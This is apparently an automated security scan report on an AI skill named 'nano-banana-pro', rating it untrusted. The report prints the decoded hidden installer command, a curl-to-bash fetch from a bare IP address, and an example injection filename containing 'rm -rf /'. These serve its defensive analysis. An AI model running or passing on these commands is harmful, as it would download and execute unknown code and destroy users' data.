Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution via MacOS Installer, Potential Command Injection via User-Provided Filename.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-mzvmth/SKILL.md:10 | |
| CRITICAL | Arbitrary Code Execution via MacOS Installer The MacOS installation instruction uses a base64 encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This command downloads and executes an arbitrary script from an external, untrusted IP address (`91.92.242.30`) directly into a bash shell. This constitutes a severe command injection, hidden instruction, and supply chain risk, as the content of the downloaded script is unknown and could contain malicious code, leading to full system compromise. Replace the arbitrary script download and execution with a verifiable and secure installation method, such as a package manager (e.g., Homebrew) or a direct download from a trusted source with checksum verification. Avoid piping `curl` output directly to `bash`. | LLM | SKILL.md:12 | |
| HIGH | Potential Command Injection via User-Provided Filename The skill instructs users to provide a `--filename` argument directly in the example commands (e.g., `--filename "output-name.png"`). If the underlying `generate_image.py` script does not rigorously sanitize this user-provided filename before using it in file system operations or any shell commands (e.g., `os.system`, `subprocess.run`), it could be vulnerable to command injection. A malicious filename like `"; rm -rf /; #.png"` could execute arbitrary commands. The skill's own filename generation guidelines conflict with the examples showing direct user input for filenames. Ensure that the `generate_image.py` script strictly sanitizes all user-provided filenames, allowing only alphanumeric characters, hyphens, and underscores, and preventing any path traversal or command injection characters. Alternatively, enforce the skill to *generate* the filename internally based on safe patterns, rather than accepting direct user input for the full filename. | LLM | SKILL.md:20 | |
| MEDIUM | Supply Chain Risk from Direct Binary Download (Windows) The Windows installation instructs users to download a `.zip` file from a GitHub release (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`). While GitHub is a common distribution platform, relying on direct downloads of external binaries without checksum verification introduces a supply chain risk. If the GitHub repository or release assets are compromised, users could download malicious software. The mention of a password for the archive adds a slight layer of obscurity but does not mitigate the core supply chain risk. Provide checksums (e.g., SHA256) for downloaded files to allow users to verify integrity. Consider using a more robust distribution mechanism or clearly stating the risks associated with direct binary downloads. | LLM | SKILL.md:9 | |
| INFO | Execution with User's Full Permissions The skill executes a Python script using `uv run`, which grants the script the full permissions of the user running the skill. This includes read/write access to the user's current working directory and potentially other system resources. While typical for local script execution, it highlights that any vulnerability within `generate_image.py` could be exploited with the user's privileges. Ensure the `generate_image.py` script follows the principle of least privilege. If possible, consider sandboxing or limiting the execution environment for skills that handle untrusted input or perform file operations. | LLM | SKILL.md:20 |
Scan History
Embed Code
[](https://skillshield.io/report/13e899d37d5bb5e3)
Powered by SkillShield